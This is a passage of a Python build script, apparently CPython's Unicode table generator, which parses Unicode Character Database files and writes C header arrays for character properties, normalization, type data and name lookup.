    ('2B740', '2B81D')
]
def maketables(trace=0):
    """Regenerate all three generated C headers from the Unicode database.

    Loads the current UCD, then every supported old version (folding the
    per-character deltas into the current data), and finally writes the
    name, property and type tables.
    """
    print("--- Reading", UNICODE_DATA % "", "...")
    version = ""
    unicode = UnicodeData(UNIDATA_VERSION)
    print(sum(1 for record in unicode.table if record), "characters")
    for version in old_versions:
        print("--- Reading", UNICODE_DATA % ("-"+version), "...")
        old_unicode = UnicodeData(version, cjk_check=False)
        print(sum(1 for record in old_unicode.table if record), "characters")
        merge_old_version(version, unicode, old_unicode)
    makeunicodename(unicode, trace)
    makeunicodedata(unicode, trace)
    makeunicodetype(unicode, trace)
# --------------------------------------------------------------------
# unicode character properties
def makeunicodedata(unicode, trace):
    """Generate Modules/unicodedata_db.h.

    Emits the per-code-point database records, the canonical decomposition
    data, the NFC composition pair table, and per-version delta tables that
    let unicodedata reconstruct older Unicode versions.

    unicode -- a fully loaded UnicodeData instance
    trace   -- verbosity passed through to splitbins()/Array.dump()
    """
    # an all-zero record represents "unassigned"; it occupies slot 0
    dummy = (0, 0, 0, 0, 0, 0)
    table = [dummy]
    cache = {0: dummy}
    index = [0] * len(unicode.chars)
    FILE = "Modules/unicodedata_db.h"
    print("--- Preparing", FILE, "...")
    # 1) database properties
    for char in unicode.chars:
        record = unicode.table[char]
        if record:
            # extract database properties
            category = CATEGORY_NAMES.index(record[2])
            combining = int(record[3])
            bidirectional = BIDIRECTIONAL_NAMES.index(record[4])
            mirrored = record[9] == "Y"
            eastasianwidth = EASTASIANWIDTH_NAMES.index(record[15])
            normalizationquickcheck = record[17]
            item = (
                category, combining, bidirectional, mirrored, eastasianwidth,
                normalizationquickcheck
                )
            # add entry to index and item tables
            # (identical records are shared through the cache)
            i = cache.get(item)
            if i is None:
                cache[item] = i = len(table)
                table.append(item)
            index[char] = i
    # 2) decomposition data
    decomp_data = [0]
    decomp_prefix = [""]
    decomp_index = [0] * len(unicode.chars)
    decomp_size = 0
    comp_pairs = []
    comp_first = [None] * len(unicode.chars)
    comp_last = [None] * len(unicode.chars)
    for char in unicode.chars:
        record = unicode.table[char]
        if record:
            if record[5]:
                decomp = record[5].split()
                if len(decomp) > 19:
                    raise Exception("character %x has a decomposition too large for nfd_nfkd" % char)
                # prefix
                if decomp[0][0] == "<":
                    prefix = decomp.pop(0)
                else:
                    prefix = ""
                try:
                    i = decomp_prefix.index(prefix)
                except ValueError:
                    i = len(decomp_prefix)
                    decomp_prefix.append(prefix)
                prefix = i
                assert prefix < 256
                # content: first entry packs prefix index (low byte) and
                # decomposition length (high bits)
                decomp = [prefix + (len(decomp)<<8)] + [int(s, 16) for s in decomp]
                # Collect NFC pairs
                if not prefix and len(decomp) == 3 and \
                   char not in unicode.exclusions and \
                   unicode.table[decomp[1]][3] == "0":
                    p, l, r = decomp
                    comp_first[l] = 1
                    comp_last[r] = 1
                    comp_pairs.append((l,r,char))
                try:
                    i = decomp_data.index(decomp)
                except ValueError:
                    i = len(decomp_data)
                    decomp_data.extend(decomp)
                    decomp_size = decomp_size + len(decomp) * 2
            else:
                i = 0
            decomp_index[char] = i
    # reindex the NFC "first" and "last" characters densely and record the
    # contiguous code-point ranges they cover (for nfc_first/nfc_last)
    f = l = 0
    comp_first_ranges = []
    comp_last_ranges = []
    prev_f = prev_l = None
    for i in unicode.chars:
        if comp_first[i] is not None:
            comp_first[i] = f
            f += 1
            if prev_f is None:
                prev_f = (i,i)
            elif prev_f[1]+1 == i:
                prev_f = prev_f[0],i
            else:
                comp_first_ranges.append(prev_f)
                prev_f = (i,i)
        if comp_last[i] is not None:
            comp_last[i] = l
            l += 1
            if prev_l is None:
                prev_l = (i,i)
            elif prev_l[1]+1 == i:
                prev_l = prev_l[0],i
            else:
                comp_last_ranges.append(prev_l)
                prev_l = (i,i)
    comp_first_ranges.append(prev_f)
    comp_last_ranges.append(prev_l)
    total_first = f
    total_last = l
    # dense total_first x total_last matrix: (first, last) -> composed char
    comp_data = [0]*(total_first*total_last)
    for f,l,char in comp_pairs:
        f = comp_first[f]
        l = comp_last[l]
        comp_data[f*total_last+l] = char
    print(len(table), "unique properties")
    print(len(decomp_prefix), "unique decomposition prefixes")
    print(len(decomp_data), "unique decomposition entries:", end=' ')
    print(decomp_size, "bytes")
    print(total_first, "first characters in NFC")
    print(total_last, "last characters in NFC")
    print(len(comp_pairs), "NFC pairs")
    print("--- Writing", FILE, "...")
    fp = open(FILE, "w")
    print("/* this file was generated by %s %s */" % (SCRIPT, VERSION), file=fp)
    print(file=fp)
    print('#define UNIDATA_VERSION "%s"' % UNIDATA_VERSION, file=fp)
    print("/* a list of unique database records */", file=fp)
    print("const _PyUnicode_DatabaseRecord _PyUnicode_Database_Records[] = {", file=fp)
    for item in table:
        print("    {%d, %d, %d, %d, %d, %d}," % item, file=fp)
    print("};", file=fp)
    print(file=fp)
    print("/* Reindexing of NFC first characters. */", file=fp)
    print("#define TOTAL_FIRST",total_first, file=fp)
    print("#define TOTAL_LAST",total_last, file=fp)
    print("struct reindex{int start;short count,index;};", file=fp)
    print("static struct reindex nfc_first[] = {", file=fp)
    for start,end in comp_first_ranges:
        print("  { %d, %d, %d}," % (start,end-start,comp_first[start]), file=fp)
    print("  {0,0,0}", file=fp)
    print("};\n", file=fp)
    print("static struct reindex nfc_last[] = {", file=fp)
    for start,end in comp_last_ranges:
        print("  { %d, %d, %d}," % (start,end-start,comp_last[start]), file=fp)
    print("  {0,0,0}", file=fp)
    print("};\n", file=fp)
    # FIXME: <fl> the following tables could be made static, and
    # the support code moved into unicodedatabase.c
    print("/* string literals */", file=fp)
    print("const char *_PyUnicode_CategoryNames[] = {", file=fp)
    for name in CATEGORY_NAMES:
        print("    \"%s\"," % name, file=fp)
    print("    NULL", file=fp)
    print("};", file=fp)
    print("const char *_PyUnicode_BidirectionalNames[] = {", file=fp)
    for name in BIDIRECTIONAL_NAMES:
        print("    \"%s\"," % name, file=fp)
    print("    NULL", file=fp)
    print("};", file=fp)
    print("const char *_PyUnicode_EastAsianWidthNames[] = {", file=fp)
    for name in EASTASIANWIDTH_NAMES:
        print("    \"%s\"," % name, file=fp)
    print("    NULL", file=fp)
    print("};", file=fp)
    print("static const char *decomp_prefix[] = {", file=fp)
    for name in decomp_prefix:
        print("    \"%s\"," % name, file=fp)
    print("    NULL", file=fp)
    print("};", file=fp)
    # split record index table
    index1, index2, shift = splitbins(index, trace)
    print("/* index tables for the database records */", file=fp)
    print("#define SHIFT", shift, file=fp)
    Array("index1", index1).dump(fp, trace)
    Array("index2", index2).dump(fp, trace)
    # split decomposition index table
    index1, index2, shift = splitbins(decomp_index, trace)
    print("/* decomposition data */", file=fp)
    Array("decomp_data", decomp_data).dump(fp, trace)
    print("/* index tables for the decomposition data */", file=fp)
    print("#define DECOMP_SHIFT", shift, file=fp)
    Array("decomp_index1", index1).dump(fp, trace)
    Array("decomp_index2", index2).dump(fp, trace)
    index, index2, shift = splitbins(comp_data, trace)
    print("/* NFC pairs */", file=fp)
    print("#define COMP_SHIFT", shift, file=fp)
    Array("comp_index", index).dump(fp, trace)
    Array("comp_data", index2).dump(fp, trace)
    # Generate delta tables for old versions
    for version, table, normalization in unicode.changed:
        cversion = version.replace(".","_")
        records = [table[0]]
        cache = {table[0]:0}
        index = [0] * len(table)
        for i, record in enumerate(table):
            try:
                index[i] = cache[record]
            except KeyError:
                index[i] = cache[record] = len(records)
                records.append(record)
        index1, index2, shift = splitbins(index, trace)
        print("static const change_record change_records_%s[] = {" % cversion, file=fp)
        for record in records:
            print("\t{ %s }," % ", ".join(map(str,record)), file=fp)
        print("};", file=fp)
        Array("changes_%s_index" % cversion, index1).dump(fp, trace)
        Array("changes_%s_data" % cversion, index2).dump(fp, trace)
        print("static const change_record* get_change_%s(Py_UCS4 n)" % cversion, file=fp)
        print("{", file=fp)
        print("\tint index;", file=fp)
        print("\tif (n >= 0x110000) index = 0;", file=fp)
        print("\telse {", file=fp)
        print("\t\tindex = changes_%s_index[n>>%d];" % (cversion, shift), file=fp)
        print("\t\tindex = changes_%s_data[(index<<%d)+(n & %d)];" % \
              (cversion, shift, ((1<<shift)-1)), file=fp)
        print("\t}", file=fp)
        print("\treturn change_records_%s+index;" % cversion, file=fp)
        print("}\n", file=fp)
        print("static Py_UCS4 normalization_%s(Py_UCS4 n)" % cversion, file=fp)
        print("{", file=fp)
        print("\tswitch(n) {", file=fp)
        for k, v in normalization:
            print("\tcase %s: return 0x%s;" % (hex(k), v), file=fp)
        print("\tdefault: return 0;", file=fp)
        print("\t}\n}\n", file=fp)
    fp.close()
# --------------------------------------------------------------------
# unicode character type tables
def makeunicodetype(unicode, trace):
    """Generate Objects/unicodetype_db.h.

    Emits the character-type records (upper/lower/title mappings or deltas,
    decimal/digit values, flag bits) plus generated C functions for numeric
    value, whitespace and linebreak predicates.
    """
    FILE = "Objects/unicodetype_db.h"
    print("--- Preparing", FILE, "...")
    # extract unicode types
    dummy = (0, 0, 0, 0, 0, 0)
    table = [dummy]
    cache = {0: dummy}
    index = [0] * len(unicode.chars)
    numeric = {}
    spaces = []
    linebreaks = []
    for char in unicode.chars:
        record = unicode.table[char]
        if record:
            # extract database properties
            category = record[2]
            bidirectional = record[4]
            properties = record[16]
            flags = 0
            delta = True  # NOTE(review): set but never read below
            if category in ["Lm", "Lt", "Lu", "Ll", "Lo"]:
                flags |= ALPHA_MASK
            if category == "Ll":
                flags |= LOWER_MASK
            if 'Line_Break' in properties or bidirectional == "B":
                flags |= LINEBREAK_MASK
                linebreaks.append(char)
            if category == "Zs" or bidirectional in ("WS", "B", "S"):
                flags |= SPACE_MASK
                spaces.append(char)
            if category == "Lt":
                flags |= TITLE_MASK
            if category == "Lu":
                flags |= UPPER_MASK
            if char == ord(" ") or category[0] not in ("C", "Z"):
                flags |= PRINTABLE_MASK
            if "XID_Start" in properties:
                flags |= XID_START_MASK
            if "XID_Continue" in properties:
                flags |= XID_CONTINUE_MASK
            # use delta predictor for upper/lower/title if it fits
            if record[12]:
                upper = int(record[12], 16)
            else:
                upper = char
            if record[13]:
                lower = int(record[13], 16)
            else:
                lower = char
            if record[14]:
                title = int(record[14], 16)
            else:
                # UCD.html says that a missing title char means that
                # it defaults to the uppercase character, not to the
                # character itself. Apparently, in the current UCD (5.x)
                # this feature is never used
                title = upper
            upper_d = upper - char
            lower_d = lower - char
            title_d = title - char
            if -32768 <= upper_d <= 32767 and \
               -32768 <= lower_d <= 32767 and \
               -32768 <= title_d <= 32767:
                # use deltas (stored as unsigned 16-bit two's complement)
                upper = upper_d & 0xffff
                lower = lower_d & 0xffff
                title = title_d & 0xffff
            else:
                flags |= NODELTA_MASK
            # decimal digit, integer digit
            decimal = 0
            if record[6]:
                flags |= DECIMAL_MASK
                decimal = int(record[6])
            digit = 0
            if record[7]:
                flags |= DIGIT_MASK
                digit = int(record[7])
            if record[8]:
                flags |= NUMERIC_MASK
                numeric.setdefault(record[8], []).append(char)
            item = (
                upper, lower, title, decimal, digit, flags
                )
            # add entry to index and item tables
            i = cache.get(item)
            if i is None:
                cache[item] = i = len(table)
                table.append(item)
            index[char] = i
    print(len(table), "unique character type entries")
    print(sum(map(len, numeric.values())), "numeric code points")
    print(len(spaces), "whitespace code points")
    print(len(linebreaks), "linebreak code points")
    print("--- Writing", FILE, "...")
    fp = open(FILE, "w")
    print("/* this file was generated by %s %s */" % (SCRIPT, VERSION), file=fp)
    print(file=fp)
    print("/* a list of unique character type descriptors */", file=fp)
    print("const _PyUnicode_TypeRecord _PyUnicode_TypeRecords[] = {", file=fp)
    for item in table:
        print("    {%d, %d, %d, %d, %d, %d}," % item, file=fp)
    print("};", file=fp)
    print(file=fp)
    # split decomposition index table
    index1, index2, shift = splitbins(index, trace)
    print("/* type indexes */", file=fp)
    print("#define SHIFT", shift, file=fp)
    Array("index1", index1).dump(fp, trace)
    Array("index2", index2).dump(fp, trace)
    # Generate code for _PyUnicode_ToNumeric()
    numeric_items = sorted(numeric.items())
    print('/* Returns the numeric value as double for Unicode characters', file=fp)
    print(' * having this property, -1.0 otherwise.', file=fp)
    print(' */', file=fp)
    print('double _PyUnicode_ToNumeric(Py_UCS4 ch)', file=fp)
    print('{', file=fp)
    print('    switch (ch) {', file=fp)
    for value, codepoints in numeric_items:
        # Turn text into float literals
        parts = value.split('/')
        parts = [repr(float(part)) for part in parts]
        value = '/'.join(parts)
        codepoints.sort()
        for codepoint in codepoints:
            print('    case 0x%04X:' % (codepoint,), file=fp)
        print('        return (double) %s;' % (value,), file=fp)
    print('    }', file=fp)
    print('    return -1.0;', file=fp)
    print('}', file=fp)
    print(file=fp)
    # Generate code for _PyUnicode_IsWhitespace()
    print("/* Returns 1 for Unicode characters having the bidirectional", file=fp)
    print(" * type 'WS', 'B' or 'S' or the category 'Zs', 0 otherwise.", file=fp)
    print(" */", file=fp)
    print('int _PyUnicode_IsWhitespace(register const Py_UCS4 ch)', file=fp)
    print('{', file=fp)
    print('    switch (ch) {', file=fp)
    for codepoint in sorted(spaces):
        print('    case 0x%04X:' % (codepoint,), file=fp)
    print('        return 1;', file=fp)
    print('    }', file=fp)
    print('    return 0;', file=fp)
    print('}', file=fp)
    print(file=fp)
    # Generate code for _PyUnicode_IsLinebreak()
    print("/* Returns 1 for Unicode characters having the line break", file=fp)
    print(" * property 'BK', 'CR', 'LF' or 'NL' or having bidirectional", file=fp)
    print(" * type 'B', 0 otherwise.", file=fp)
    print(" */", file=fp)
    print('int _PyUnicode_IsLinebreak(register const Py_UCS4 ch)', file=fp)
    print('{', file=fp)
    print('    switch (ch) {', file=fp)
    for codepoint in sorted(linebreaks):
        print('    case 0x%04X:' % (codepoint,), file=fp)
    print('        return 1;', file=fp)
    print('    }', file=fp)
    print('    return 0;', file=fp)
    print('}', file=fp)
    print(file=fp)
    fp.close()
# --------------------------------------------------------------------
# unicode name database
def makeunicodename(unicode, trace):
    """Generate Modules/unicodename_db.h.

    Builds a compressed lexicon of name words, a phrasebook mapping code
    points to word sequences, and a static hash table for the reverse
    name->code lookup.
    """
    FILE = "Modules/unicodename_db.h"
    print("--- Preparing", FILE, "...")
    # collect names (NUL-terminated; <...> placeholder names are skipped)
    names = [None] * len(unicode.chars)
    for char in unicode.chars:
        record = unicode.table[char]
        if record:
            name = record[1].strip()
            if name and name[0] != "<":
                names[char] = name + chr(0)
    print(len(list(n for n in names if n is not None)), "distinct names")
    # collect unique words from names (note that we differ between
    # words inside a sentence, and words ending a sentence.  the
    # latter includes the trailing null byte.
    words = {}
    n = b = 0
    for char in unicode.chars:
        name = names[char]
        if name:
            w = name.split()
            b = b + len(name)
            n = n + len(w)
            for w in w:
                l = words.get(w)
                if l:
                    # only the occurrence count matters, not the entries
                    l.append(None)
                else:
                    words[w] = [len(words)]
    print(n, "words in text;", b, "bytes")
    wordlist = list(words.items())
    # sort on falling frequency, then by name
    def word_key(a):
        aword, alist = a
        return -len(alist), aword
    wordlist.sort(key=word_key)
    # figure out how many phrasebook escapes we need
    escapes = 0
    while escapes * 256 < len(wordlist):
        escapes = escapes + 1
    print(escapes, "escapes")
    short = 256 - escapes
    assert short > 0
    print(short, "short indexes in lexicon")
    # statistics
    n = 0
    for i in range(short):
        n = n + len(wordlist[i][1])
    print(n, "short indexes in phrasebook")
    # pick the most commonly used words, and sort the rest on falling
    # length (to maximize overlap)
    wordlist, wordtail = wordlist[:short], wordlist[short:]
    wordtail.sort(key=lambda a: a[0], reverse=True)
    wordlist.extend(wordtail)
    # generate lexicon from words
    lexicon_offset = [0]
    lexicon = ""
    words = {}
    # build a lexicon string
    offset = 0
    for w, x in wordlist:
        # encoding: bit 7 indicates last character in word (chr(128)
        # indicates the last character in an entire string)
        ww = w[:-1] + chr(ord(w[-1])+128)
        # reuse string tails, when possible
        o = lexicon.find(ww)
        if o < 0:
            o = offset
            lexicon = lexicon + ww
            offset = offset + len(w)
        words[w] = len(lexicon_offset)
        lexicon_offset.append(o)
    lexicon = list(map(ord, lexicon))
    # generate phrasebook from names and lexicon
    phrasebook = [0]
    phrasebook_offset = [0] * len(unicode.chars)
    for char in unicode.chars:
        name = names[char]
        if name:
            w = name.split()
            phrasebook_offset[char] = len(phrasebook)
            for w in w:
                i = words[w]
                if i < short:
                    phrasebook.append(i)
                else:
                    # store as two bytes
                    phrasebook.append((i>>8) + short)
                    phrasebook.append(i&255)
    # the phrasebook must fit in an unsigned-char array
    assert getsize(phrasebook) == 1
    #
    # unicode name hash table
    # extract names
    data = []
    for char in unicode.chars:
        record = unicode.table[char]
        if record:
            name = record[1].strip()
            if name and name[0] != "<":
                data.append((name, char))
    # the magic number 47 was chosen to minimize the number of
    # collisions on the current data set. if you like, change it
    # and see what happens...
    codehash = Hash("code", data, 47)
    print("--- Writing", FILE, "...")
    fp = open(FILE, "w")
    print("/* this file was generated by %s %s */" % (SCRIPT, VERSION), file=fp)
    print(file=fp)
    print("#define NAME_MAXLEN", 256, file=fp)
    print(file=fp)
    print("/* lexicon */", file=fp)
    Array("lexicon", lexicon).dump(fp, trace)
    Array("lexicon_offset", lexicon_offset).dump(fp, trace)
    # split decomposition index table
    offset1, offset2, shift = splitbins(phrasebook_offset, trace)
    print("/* code->name phrasebook */", file=fp)
    print("#define phrasebook_shift", shift, file=fp)
    print("#define phrasebook_short", short, file=fp)
    Array("phrasebook", phrasebook).dump(fp, trace)
    Array("phrasebook_offset1", offset1).dump(fp, trace)
    Array("phrasebook_offset2", offset2).dump(fp, trace)
    print("/* name->code dictionary */", file=fp)
    codehash.dump(fp, trace)
    fp.close()
def merge_old_version(version, new, old):
    """Fold the differences between an old UCD and the current one into
    new.changed as per-character delta records.

    A delta record carries (bidir, category, decimal, mirrored, numeric)
    changes; 0xFF (or 0 for the numeric field) means "no change".
    """
    # Changes to exclusion file not implemented yet
    if old.exclusions != new.exclusions:
        raise NotImplementedError("exclusions differ")
    # In these change records, 0xFF means "no change"
    bidir_changes = [0xFF]*0x110000
    category_changes = [0xFF]*0x110000
    decimal_changes = [0xFF]*0x110000
    mirrored_changes = [0xFF]*0x110000
    # In numeric data, 0 means "no change",
    # -1 means "did not have a numeric value
    numeric_changes = [0] * 0x110000
    # normalization_changes is a list of key-value pairs
    normalization_changes = []
    for i in range(0x110000):
        if new.table[i] is None:
            # Characters unassigned in the new version ought to
            # be unassigned in the old one
            assert old.table[i] is None
            continue
        # check characters unassigned in the old version
        if old.table[i] is None:
            # category 0 is "unassigned"
            category_changes[i] = 0
            continue
        # check characters that differ
        if old.table[i] != new.table[i]:
            # k indexes the UnicodeData record fields (see UnicodeData class)
            for k in range(len(old.table[i])):
                if old.table[i][k] != new.table[i][k]:
                    value = old.table[i][k]
                    if k == 2:
                        #print "CATEGORY",hex(i), old.table[i][k], new.table[i][k]
                        category_changes[i] = CATEGORY_NAMES.index(value)
                    elif k == 4:
                        #print "BIDIR",hex(i), old.table[i][k], new.table[i][k]
                        bidir_changes[i] = BIDIRECTIONAL_NAMES.index(value)
                    elif k == 5:
                        #print "DECOMP",hex(i), old.table[i][k], new.table[i][k]
                        # We assume that all normalization changes are in 1:1 mappings
                        assert " " not in value
                        normalization_changes.append((i, value))
                    elif k == 6:
                        #print "DECIMAL",hex(i), old.table[i][k], new.table[i][k]
                        # we only support changes where the old value is a single digit
                        assert value in "0123456789"
                        decimal_changes[i] = int(value)
                    elif k == 8:
                        # print "NUMERIC",hex(i), `old.table[i][k]`, new.table[i][k]
                        # Since 0 encodes "no change", the old value is better not 0
                        if not value:
                            numeric_changes[i] = -1
                        else:
                            numeric_changes[i] = float(value)
                            assert numeric_changes[i] not in (0, -1)
                    elif k == 9:
                        if value == 'Y':
                            mirrored_changes[i] = '1'
                        else:
                            mirrored_changes[i] = '0'
                    elif k == 11:
                        # change to ISO comment, ignore
                        pass
                    elif k == 12:
                        # change to simple uppercase mapping; ignore
                        pass
                    elif k == 13:
                        # change to simple lowercase mapping; ignore
                        pass
                    elif k == 14:
                        # change to simple titlecase mapping; ignore
                        pass
                    elif k == 16:
                        # derived property changes; not yet
                        pass
                    elif k == 17:
                        # normalization quickchecks are not performed
                        # for older versions
                        pass
                    else:
                        class Difference(Exception):pass
                        raise Difference(hex(i), k, old.table[i], new.table[i])
    new.changed.append((version, list(zip(bidir_changes, category_changes,
                                          decimal_changes, mirrored_changes,
                                          numeric_changes)),
                        normalization_changes))
def open_data(template, version):
    """Return an open file object for the given UCD data file.

    The file is downloaded from unicode.org into the working directory
    the first time it is needed.  *.txt files come back in UTF-8 text
    mode; everything else (Unihan.zip) in binary mode.
    """
    local = template % ('-'+version,)
    if not os.path.exists(local):
        import urllib.request
        if version == '3.2.0':
            # irregular url structure
            url = 'http://www.unicode.org/Public/3.2-Update/' + local
        else:
            url = ('http://www.unicode.org/Public/%s/ucd/'+template) % (version, '')
        urllib.request.urlretrieve(url, filename=local)
    if local.endswith('.txt'):
        return open(local, encoding='utf-8')
    # Unihan.zip is handed to ZipFile, which wants raw bytes
    return open(local, 'rb')
# --------------------------------------------------------------------
# the following support code is taken from the unidb utilities
# Copyright (c) 1999-2000 by Secret Labs AB
# load a unicode-data file from disk
class UnicodeData:
    """In-memory representation of one version of the Unicode database."""
    # Record structure:
    # [ID, name, category, combining, bidi, decomp, (6)
    # decimal, digit, numeric, bidi-mirrored, Unicode-1-name, (11)
    # ISO-comment, uppercase, lowercase, titlecase, ea-width, (16)
    # derived-props] (17)
    def __init__(self, version,
                 linebreakprops=False,
                 expand=1,
                 cjk_check=True):
        """Load and cross-link all UCD files for the given version.

        Populates self.table (one record per code point, None when
        unassigned), self.chars, self.exclusions and self.filename;
        self.changed is later filled by merge_old_version().
        """
        self.changed = []
        file = open_data(UNICODE_DATA, version)
        table = [None] * 0x110000
        while 1:
            s = file.readline()
            if not s:
                break
            s = s.strip().split(";")
            char = int(s[0], 16)
            table[char] = s
        cjk_ranges_found = []
        # expand first-last ranges
        if expand:
            field = None
            for i in range(0, 0x110000):
                s = table[i]
                if s:
                    if s[1][-6:] == "First>":
                        s[1] = ""
                        field = s
                    elif s[1][-5:] == "Last>":
                        if s[1].startswith("<CJK Ideograph"):
                            cjk_ranges_found.append((field[0],
                                                     s[0]))
                        s[1] = ""
                        field = None
                elif field:
                    # inside a First>/Last> range: clone the First record
                    f2 = field[:]
                    f2[0] = "%X" % i
                    table[i] = f2
        if cjk_check and cjk_ranges != cjk_ranges_found:
            raise ValueError("CJK ranges deviate: have %r" % cjk_ranges_found)
        # public attributes
        self.filename = UNICODE_DATA % ''
        self.table = table
        self.chars = list(range(0x110000)) # unicode 3.2
        file = open_data(COMPOSITION_EXCLUSIONS, version)
        self.exclusions = {}
        for s in file:
            s = s.strip()
            if not s:
                continue
            if s[0] == '#':
                continue
            char = int(s.split()[0],16)
            self.exclusions[char] = 1
        # field 15: east asian width
        widths = [None] * 0x110000
        for s in open_data(EASTASIAN_WIDTH, version):
            s = s.strip()
            if not s:
                continue
            if s[0] == '#':
                continue
            s = s.split()[0].split(';')
            if '..' in s[0]:
                first, last = [int(c, 16) for c in s[0].split('..')]
                chars = list(range(first, last+1))
            else:
                chars = [int(s[0], 16)]
            for char in chars:
                widths[char] = s[1]
        for i in range(0, 0x110000):
            if table[i] is not None:
                table[i].append(widths[i])
        # field 16: set of derived core properties (plus 'Line_Break' below)
        for i in range(0, 0x110000):
            if table[i] is not None:
                table[i].append(set())
        for s in open_data(DERIVED_CORE_PROPERTIES, version):
            s = s.split('#', 1)[0].strip()
            if not s:
                continue
            r, p = s.split(";")
            r = r.strip()
            p = p.strip()
            if ".." in r:
                first, last = [int(c, 16) for c in r.split('..')]
                chars = list(range(first, last+1))
            else:
                chars = [int(r, 16)]
            for char in chars:
                if table[char]:
                    # Some properties (e.g. Default_Ignorable_Code_Point)
                    # apply to unassigned code points; ignore them
                    table[char][-1].add(p)
        for s in open_data(LINE_BREAK, version):
            s = s.partition('#')[0]
            s = [i.strip() for i in s.split(';')]
            if len(s) < 2 or s[1] not in MANDATORY_LINE_BREAKS:
                continue
            if '..' not in s[0]:
                first = last = int(s[0], 16)
            else:
                first, last = [int(c, 16) for c in s[0].split('..')]
            for char in range(first, last+1):
                table[char][-1].add('Line_Break')
        # We only want the quickcheck properties
        # Format: NF?_QC; Y(es)/N(o)/M(aybe)
        # Yes is the default, hence only N and M occur
        # In 3.2.0, the format was different (NF?_NO)
        # The parsing will incorrectly determine these as
        # "yes", however, unicodedata.c will not perform quickchecks
        # for older versions, and no delta records will be created.
        quickchecks = [0] * 0x110000
        qc_order = 'NFD_QC NFKD_QC NFC_QC NFKC_QC'.split()
        for s in open_data(DERIVEDNORMALIZATION_PROPS, version):
            if '#' in s:
                s = s[:s.index('#')]
            s = [i.strip() for i in s.split(';')]
            if len(s) < 2 or s[1] not in qc_order:
                continue
            quickcheck = 'MN'.index(s[2]) + 1 # Maybe or No
            quickcheck_shift = qc_order.index(s[1])*2
            quickcheck <<= quickcheck_shift
            if '..' not in s[0]:
                first = last = int(s[0], 16)
            else:
                first, last = [int(c, 16) for c in s[0].split('..')]
            for char in range(first, last+1):
                assert not (quickchecks[char]>>quickcheck_shift)&3
                quickchecks[char] |= quickcheck
        # field 17: packed NF*_QC quickcheck bits (two bits per form)
        for i in range(0, 0x110000):
            if table[i] is not None:
                table[i].append(quickchecks[i])
        # patch numeric values (field 8) for CJK ideographs from Unihan
        zip = zipfile.ZipFile(open_data(UNIHAN, version))
        if version == '3.2.0':
            data = zip.open('Unihan-3.2.0.txt').read()
        else:
            data = zip.open('Unihan_NumericValues.txt').read()
        for line in data.decode("utf-8").splitlines():
            if not line.startswith('U+'):
                continue
            code, tag, value = line.split(None, 3)[:3]
            if tag not in ('kAccountingNumeric', 'kPrimaryNumeric',
                           'kOtherNumeric'):
                continue
            value = value.strip().replace(',', '')
            i = int(code[2:], 16)
            # Patch the numeric field
            if table[i] is not None:
                table[i][8] = value
    def uselatin1(self):
        """Restrict self.chars to ISO Latin-1 (first 256 code points)."""
        # restrict character range to ISO Latin 1
        self.chars = list(range(256))
# hash table tools
# this is a straight-forward reimplementation of Python's built-in
# dictionary type, using a static data structure, and a custom string
# hash algorithm.
def myhash(s, magic):
    """Case-insensitive multiplicative string hash, confined to 24 bits.

    Whenever the running value spills past 24 bits, the overflowing byte
    is folded back in with xor so the result always fits an unsigned
    24-bit integer.
    """
    h = 0
    for ch in s.upper():
        h = h * magic + ord(ch)
        overflow = h & 0xff000000
        if overflow:
            h = (h ^ ((overflow >> 24) & 0xff)) & 0x00ffffff
    return h
# candidate (table size, polynomial) pairs for the static hash table;
# sizes are powers of two, each paired with the polynomial used to
# perturb the probe increment on collisions (see Hash.__init__)
SIZES = [
    (4,3), (8,3), (16,3), (32,5), (64,3), (128,3), (256,29), (512,17),
    (1024,9), (2048,5), (4096,83), (8192,27), (16384,43), (32768,3),
    (65536,45), (131072,9), (262144,39), (524288,39), (1048576,9),
    (2097152,5), (4194304,3), (8388608,33), (16777216,27)
]
class Hash:
    """Static open-addressing hash table, emitted as C arrays + #defines."""
    def __init__(self, name, data, magic):
        # turn a (key, value) list into a static hash table structure
        # determine table size: first power of two larger than the data set
        for size, poly in SIZES:
            if size > len(data):
                poly = size + poly
                break
        else:
            raise AssertionError("ran out of polynomials")
        print(size, "slots in hash table")
        table = [None] * size
        mask = size-1
        n = 0
        hash = myhash
        # initialize hash table
        for key, value in data:
            h = hash(key, magic)
            i = (~h) & mask
            v = table[i]
            if v is None:
                table[i] = value
                continue
            # collision: probe with a double-hashed increment, mutating it
            # with the polynomial (CRC-style) so the probe sequence varies
            incr = (h ^ (h >> 3)) & mask;
            if not incr:
                incr = mask
            while 1:
                n = n + 1
                i = (i + incr) & mask
                v = table[i]
                if v is None:
                    table[i] = value
                    break
                incr = incr << 1
                if incr > mask:
                    incr = incr ^ poly
        print(n, "collisions")
        self.collisions = n
        # empty slots become 0 so the table can live in an unsigned array
        for i in range(len(table)):
            if table[i] is None:
                table[i] = 0
        self.data = Array(name + "_hash", table)
        self.magic = magic
        self.name = name
        self.size = size
        self.poly = poly
    def dump(self, file, trace):
        # write data to file, as a C array
        self.data.dump(file, trace)
        file.write("#define %s_magic %d\n" % (self.name, self.magic))
        file.write("#define %s_size %d\n" % (self.name, self.size))
        file.write("#define %s_poly %d\n" % (self.name, self.poly))
# stuff to deal with arrays of unsigned integers
class Array:
    """A named C array of unsigned integers, dumped in the narrowest
    element type (char/short/int) that can hold every value."""

    def __init__(self, name, data):
        self.name = name
        self.data = data

    def dump(self, file, trace=0):
        """Emit the array as a C definition, wrapping rows at 78 columns."""
        width = getsize(self.data)
        if trace:
            print(self.name+":", width*len(self.data), "bytes", file=sys.stderr)
        file.write("static ")
        if width == 1:
            file.write("unsigned char")
        elif width == 2:
            file.write("unsigned short")
        else:
            file.write("unsigned int")
        file.write(" " + self.name + "[] = {\n")
        if self.data:
            row = "    "
            for value in self.data:
                cell = str(value) + ", "
                if len(row) + len(cell) > 78:
                    # current row is full -- flush and start a new one
                    file.write(row + "\n")
                    row = "    " + cell
                else:
                    row = row + cell
            if row.strip():
                file.write(row + "\n")
        file.write("};\n\n")
def getsize(data):
    """Return the smallest C integer width (1, 2 or 4 bytes) able to
    represent every value in *data*."""
    biggest = max(data)
    if biggest < 256:
        return 1
    if biggest < 65536:
        return 2
    return 4
def splitbins(t, trace=0):
    """t, trace=0 -> (t1, t2, shift). Split a table to save space.

    t is a sequence of ints. This function can be useful to save space if
    many of the ints are the same. t1 and t2 are lists of ints, and shift
    is an int, chosen to minimize the combined size of t1 and t2 (in C
    code), and where for each i in range(len(t)),
        t[i] == t2[(t1[i >> shift] << shift) + (i & mask)]
    where mask is a bitmask isolating the last "shift" bits.

    If optional arg trace is non-zero (default zero), progress info
